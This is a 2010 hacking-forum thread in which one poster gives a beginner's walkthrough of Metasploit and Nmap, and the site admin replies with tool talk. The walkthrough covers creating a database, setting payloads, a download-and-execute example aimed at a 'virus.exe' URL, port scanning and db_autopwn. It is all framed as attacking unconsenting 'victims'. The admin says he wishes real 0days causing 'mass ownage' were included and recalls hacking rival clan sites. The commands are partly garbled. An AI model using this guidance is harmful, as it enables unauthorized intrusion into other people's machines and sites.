KidPeek

Researching, Proof of Concepts, Hacking, Console Modding and Hacking and more. No game hacking / modding here.
Post Reply
Ritterkreuzträger
Allie
Allie
Posts: 105
Joined: Tue Jan 12, 2010 2:59 pm

KidPeek

Post by Ritterkreuzträger »

This will make you really elite skid, ive reached next level :)
So what you need to do it:
System lower than VISTA or any *nix. If you have no one, just like me, i suggest you to download VMWare and WinXP VMImage (thepiratebay.org). Also there are a Backtrack nix system, which as i heard VERY powerful and have such tools already inbuilt. But backtrack is the first nix i ever tried to used, it is totally CMD only, so i dont even know any commands and stuff, ive gave it up after 10 minutes.
WinPCap. Thats the main reason why you have to use anything expect VISTA or 7 - winpcap aint working on those systems.
Metasploit&NMap. Metasploit - powerful self-explanotory exploiting tool. NMap - powerful port scanner.
Because i have no Backtrack or nix, i will explain you stuff for WinXP.
After installing metasploit(NMap included to installer), do not launch metasploit itself(Well,you can but then you will spend your time for great justice and happy future of humanity), launch the update first. You will see some shit like "Configuring multi-user permissions", this may take 4-6 minutes, but this shit happens only at first launch.
After update completed, wait till Update windows closed and then open then metasploit console itself. Wait a little bit again, and then the windows is booted up, write in:

Code: Select all

db_create
This will create somekind of database which metasploit will use and write in stuff for the runtime.
Then we need to connect to this db, write down:

Code: Select all

db_connect
We are successfully connected to DB. Now, i will explain few main functions, which will help you at final.

Code: Select all

Set - set someting
Show - show something
Use - use something(Exploit or Payload)
Search - search in exploits by name and description
Exploit\Run - Run exploit
Check - check exploit
For example, we want to use some exploit:
First, we need to set the payload:
Set Payload http/appache_chunk (not exact, just example)
and then we need to set the exploit itself
use http/appache_chunk/blahdoh
and run the exploit
Exploit\Run (but sometimes it is also requires to connect)
Well, for example we have working exploit, but what it do? How this works and so on?
After we set exploit and payload, we will write:

Code: Select all

show info
This will show you info about the exploit you are using.

Code: Select all

show options
For example, for download_and_execute exploit this will show you RHOST, RPORT.

Code: Select all

set RHOST http://sethioz.com/virus.exe
set RPORT 80
Then exploit.
It was the main part, now the easiest. Metasploit 3.4 have db_autopwn.
First, run CMD. Write in

Code: Select all

ping IP
. If you are sure what target have static ip and he is online, but packets aint recieved, then he is using firewall and not exploitable at all.
If pockets are recieved, then go on.
In metasploit, write again db_create , db_connect.
Now the part wheres NMap comes in use:

Code: Select all

nmap -sT -sV IP
This will probably give you a list of open ports and user"s OS. If OS is not given, then he is not exploitable.
Next, write down:

Code: Select all

db_autopwn -p -t -e
If you are lucky enough and victim is gay enough, you will see a list of avaliable exploits. If yes, here is the first part of article comes in use.
UPD: Damn, NMap sucks a lot. Its gives you WRONG info. Use Blue"s Port Scanner to find out opened ports on IP and Acunetix Web Scanner to detect OS. Then, use the Search thing.
Last edited by Ritterkreuzträger on Tue May 25, 2010 4:31 pm, edited 3 times in total.
User avatar
Sethioz
Admin
Admin
Posts: 4762
Joined: Fri Jul 27, 2007 5:11 pm
Custom: Gaming YT > https://youtube.com/SethiozEntertainment
Game Hacking YT > https://youtube.com/sethioz
Game Hacks Store > https://sethioz.com/shopz
Location: unknown
Contact:

Re: KidPeek

Post by Sethioz »

umm, what exactly is this suppouse to do ? last time i used metasploit, it had a GUI, using your web browser, running on any OS that supports web browsers.

as about linux based programs, vmware player is the way to go, works perfectly for everything i need, even for wireless cracking.
Ritterkreuzträger
Allie
Allie
Posts: 105
Joined: Tue Jan 12, 2010 2:59 pm

Re: KidPeek

Post by Ritterkreuzträger »

I have no idea how did you launched it in web-browser.
Attachments
Безымянный.jpg
(60.27 KiB) Downloaded 486 times
User avatar
Sethioz
Admin
Admin
Posts: 4762
Joined: Fri Jul 27, 2007 5:11 pm
Custom: Gaming YT > https://youtube.com/SethiozEntertainment
Game Hacking YT > https://youtube.com/sethioz
Game Hacks Store > https://sethioz.com/shopz
Location: unknown
Contact:

Re: KidPeek

Post by Sethioz »

http://www.metasploit.com/framework/download/
its been a long time, last i used it was back in avp2 days, when me and joonas were hacking their clan sites. its been like 4 years at least, but as it seems now, it has different versions, i might just get back to it.
Ritterkreuzträger
Allie
Allie
Posts: 105
Joined: Tue Jan 12, 2010 2:59 pm

Re: KidPeek

Post by Ritterkreuzträger »

Not really needed, there are only 1 of 10 vulnerable computers. But also it can hack web-sites i think.But also, they are might be some gay-hosting based.
User avatar
Sethioz
Admin
Admin
Posts: 4762
Joined: Fri Jul 27, 2007 5:11 pm
Custom: Gaming YT > https://youtube.com/SethiozEntertainment
Game Hacking YT > https://youtube.com/sethioz
Game Hacks Store > https://sethioz.com/shopz
Location: unknown
Contact:

Re: KidPeek

Post by Sethioz »

still not sure what you trying to do here... but as about metasploit, check the screenshot.


metasploit is quite useless, because developers are sissys, just like 99.9% of ppl who write such tools, they are completely out of date. like latest phpbb exploit availabel there, is for phpbb 2.0.15 lol... latest phpbb2 out there should be 2.0.25 and mine is phpbb3 already, they are just too sissys to put REAL stuff in there.
Attachments
metas1.JPG
(54.87 KiB) Downloaded 470 times
Ritterkreuzträger
Allie
Allie
Posts: 105
Joined: Tue Jan 12, 2010 2:59 pm

Re: KidPeek

Post by Ritterkreuzträger »

Doesnt working for me, probably i have to use other port?
Also, ive heard it is possible to put in your own exploit, i think i saw it somewhere on their site, or backtrack"s forum.
User avatar
Sethioz
Admin
Admin
Posts: 4762
Joined: Fri Jul 27, 2007 5:11 pm
Custom: Gaming YT > https://youtube.com/SethiozEntertainment
Game Hacking YT > https://youtube.com/sethioz
Game Hacks Store > https://sethioz.com/shopz
Location: unknown
Contact:

Re: KidPeek

Post by Sethioz »

sure, but its not easy as 123 + there's not much point, i don't really like such idiots who are too pussys to put the REAL exploits in there, something like 0day, which would cause mass ownage, yes i know that my own site would be at risk too, but im willing to take that risk.

i just launched the mfsweb or whatever it was, cant bother to check (its in my virtual machine and it aint running), it automatically launched browser too after it was initialized and showed this page.

change topic title ?!
Ritterkreuzträger
Allie
Allie
Posts: 105
Joined: Tue Jan 12, 2010 2:59 pm

Re: KidPeek

Post by Ritterkreuzträger »

Anyways, im not that good to make exploits, im only able to use other ppl made ones. And im not that VIP(Gay) to know private ones.
About MFSWeb, yes im a bonehead, didnt know it before. But this is very slow for me.
Post Reply